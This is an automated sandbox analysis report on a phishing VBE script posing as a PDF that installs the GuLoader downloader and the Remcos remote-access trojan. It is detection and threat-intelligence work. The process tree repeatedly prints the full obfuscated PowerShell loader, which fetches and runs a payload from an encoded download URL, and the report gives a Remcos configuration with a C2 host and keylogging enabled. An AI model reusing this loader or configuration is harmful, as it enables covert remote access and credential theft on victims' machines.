Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LSMU CITATA LT 20-11-2024#U00b7pdf.vbe

Overview

General Information

Sample name:LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
renamed because original name is a hash value
Original sample name:LSMU CITATA LT 20-11-2024pdf.vbe
Analysis ID:1559542
MD5:df045c185b46e8c2432ea266b0671f86
SHA1:db27134d7be95240a1349bbcd1a1dcfa0dfb3506
SHA256:27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181
Tags:vbeuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7280 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8020 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6304 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["gnsuw4-nsh6-mnsg.duckdns.org:3613:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8OIXMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2558798710.0000000008C10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.2543351346.0000000005D89000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2559922258.000000000A849000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7364.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7364.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfd45:$b2: ::FromBase64String(
              • 0xd0c9:$s1: -join
              • 0x6875:$s4: +=
              • 0x6937:$s4: +=
              • 0xab5e:$s4: +=
              • 0xcc7b:$s4: +=
              • 0xcf65:$s4: +=
              • 0xd0ab:$s4: +=
              • 0xf44e:$s4: +=
              • 0xf4ce:$s4: +=
              • 0xf594:$s4: +=
              • 0xf614:$s4: +=
              • 0xf7ea:$s4: +=
              • 0xf86e:$s4: +=
              • 0xd8db:$e4: Get-WmiObject
              • 0xdaca:$e4: Get-Process
              • 0xdb22:$e4: Start-Process
              amsi32_7808.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa8d2:$b2: ::FromBase64String(
              • 0x9961:$s1: -join
              • 0x310d:$s4: +=
              • 0x31cf:$s4: +=
              • 0x73f6:$s4: +=
              • 0x9513:$s4: +=
              • 0x97fd:$s4: +=
              • 0x9943:$s4: +=
              • 0x136ce:$s4: +=
              • 0x1374e:$s4: +=
              • 0x13814:$s4: +=
              • 0x13894:$s4: +=
              • 0x13a6a:$s4: +=
              • 0x13aee:$s4: +=
              • 0xa173:$e4: Get-WmiObject
              • 0xa362:$e4: Get-Process
              • 0xa3ba:$e4: Start-Process
              • 0x14334:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: L, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", ProcessId: 7280, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8020, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49799
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: L, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", ProcessId: 7280, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 